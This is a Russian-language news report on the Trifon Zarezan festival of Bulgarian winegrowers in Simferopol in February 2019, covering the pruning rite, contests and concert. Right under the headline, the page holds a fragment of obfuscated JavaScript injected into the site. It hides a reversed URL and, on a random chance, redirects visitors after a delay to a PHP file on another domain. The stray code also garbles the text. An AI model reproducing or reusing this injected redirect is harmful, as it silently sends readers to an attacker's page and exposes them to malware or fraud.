Народный праздник виноградарей и виноделов Трифон Зарезан в рамках Дней болгарской культуры

) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom_class=»]

16 февраля 2019 года в г. Симферополь в рамках Дней болгарской культуры состоялись мероприятия, приуроченные к народному празднику виноградарей и виноделов Трифон Зарезан. В день Святого Трифона, который почитается болгарами как покровитель виноградарей и виноделов, проводится обряд первой обрезки лозы (по-болгарски «обрезка» – «зарязване», поэтому и Трифона называют Зарезан).

Организаторами выступили Общественная организация «Региональная болгарская национально-культурная автономия «Паисия Хилендарского» при поддержке Министерства сельского хозяйства Республики Крым, Государственного комитета по делам межнациональных отношений и депортированных граждан Республики Крым, ГБУ РК «Дом дружбы народов», Академии биоресурсов и природопользования КФУ им. В. И. Вернадского.

Празднование было наполнено национальным колоритом и традициями, которые бережно хранят и чтут болгары Крыма.

В Академии биоресурсов и природопользования КФУ им. В. И. Вернадского состоялся молебен, рассказ об истории праздника. Гостей приветствовали председатель Общественной организации «Региональная болгарская национально-культурная автономия «Паисия Хилендарского» Иван Абажер и заместитель министра сельского хозяйства Республики Крым Сергей Петелин.

Затем гости мероприятия отправились в поле, где совершили обряд первой обрезки виноградной лозы и избрали Царя винограда 2019 года. Им стал Николай Донцов — крымский винодел в третьем поколении. Там же был проведён конкурс обрезчиков винограда. Победу одержала виноградарь завода «Массандра» Лидия Козлова.

По возвращении участникам торжества продемонстрировали процесс профессиональной оценки крымских вин, которую провели студенты и преподаватели академии. Кульминацией праздника стал концерт с участием национальных творческих коллективов Крыма, награждение победителей конкурсов и всеобщий болгарский народный танец хоро. В завершение мероприятия гостеприимные болгары пригласили присутствующих продегустировать национальные блюда и напитки. Всё празднование сопровождалось весёлыми болгарскими песнями, задорной живой музыкой и зажигательными танцами.

Репортаж телеканала «Вести Крым»